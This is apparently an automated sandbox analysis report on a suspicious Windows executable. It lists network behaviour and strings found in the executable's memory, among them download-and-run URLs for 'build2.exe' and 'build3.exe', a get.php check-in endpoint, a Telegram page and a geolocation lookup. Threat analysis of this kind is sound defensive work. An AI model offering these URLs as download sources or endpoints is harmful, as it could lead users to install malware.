00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /asifrazatg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CJNET-ASCheiljedangCoIncKR CJNET-ASCheiljedangCoIncKR
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 116.121.62.237 116.121.62.237
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aka.ms/rmsfaq)
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aka.ms/rmssdk)
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aka.ms/sia
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://aka.ms/yqwsi2)
Source: U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://creativecommons.org/ns#
Source: U59WtZz2Sg.exe, 00000001.00000002.309400317.0000000000894000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.306241286.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.306100466.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: U59WtZz2Sg.exe, 00000005.00000003.536209004.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.536117643.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
Source: U59WtZz2Sg.exe, 00000005.00000003.385085396.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.522838758.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388272737.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.487679398.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.542575948.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.488792776.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exe$run
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exe$runU
Source: U59WtZz2Sg.exe, 00000005.00000003.385085396.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.522838758.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.388272737.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.487679398.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.542575948.0000000002FAA000.00000004.00000800.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.488792776.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exe(
Source: U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/files/1/build3.exerun
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.576922763.00000000008C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/test1/get.php
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=true
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54&first=trueW
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://fresherlights.com/test1/get.phpg
Source: U59WtZz2Sg.exe, 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
Source: U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.444451772.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://uaery.top/dl/build2.exe
Source: U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://uaery.top/dl/build2.exe$run
Source: U59WtZz2Sg.exe, 00000005.00000003.385404722.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.574964169.00000000008AD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://uaery.top/dl/build2.exeJ_
Source: U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://uaery.top/dl/build2.exerunk6
Source: U59WtZz2Sg.exe, 00000005.00000003.349908003.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.amazon.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.545871666.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-C
Source: U59WtZz2Sg.exe, 00000005.00000003.408637409.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.freetype.org
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.gnu.org/licenses/gpl-2.0.html.
Source: U59WtZz2Sg.exe, 00000005.00000003.350519152.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.inkscape.org/)
Source: U59WtZz2Sg.exe, 00000005.00000003.507888546.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.501922929.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.inkscape.org/namespaces/inkscape
Source: U59WtZz2Sg.exe, 00000005.00000003.350689497.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.live.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.421301397.000000000306C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: U59WtZz2Sg.exe, 00000005.00000003.497150466.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: U59WtZz2Sg.exe, 00000005.00000003.350793064.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.408637409.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/)
Source: U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.qt.io/contact-us.
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.qt.io/licensing/
Source: U59WtZz2Sg.exe, 00000005.00000003.530047759.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528005153.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527905885.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527699347.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529404894.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528855392.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528097089.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528636685.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529863093.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.529604993.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528540404.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.527571080.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.528204840.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.qt.io/terms-conditions.
Source: U59WtZz2Sg.exe, 00000005.00000003.350865270.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.reddit.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.350997403.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.351096585.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.wikipedia.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.351612553.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: U59WtZz2Sg.exe, 00000005.00000003.362264776.0000000003060000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: U59WtZz2Sg.exe, 00000005.00000003.496991699.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: U59WtZz2Sg.exe, 00000005.00000003.469204147.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.449920000.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.450333989.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.468930777.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.447608292.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.446128369.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.471179889.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.470164900.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.459195110.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.458107166.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.471657839.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.469951048.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.446549026.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.454318911.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.470405278.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.467350799.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.454777697.0000000000610000.00000004.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.460776709.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/AA23z1a
Source: U59WtZz2Sg.exe, 00000005.00000003.457247775.0000000000610000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000003.385286762.000000000086A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/B
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.303569533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308040774.000000000089A000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000003.308057042.000000000089F000.00000004.00000020.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000004.00000002.362805036.0000000002280000.00000040.00001000.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, U59WtZz2Sg.exe, 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json5
Source: U59WtZz2Sg.exe, 00000001.00000002.309333015.0000000000827000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json=
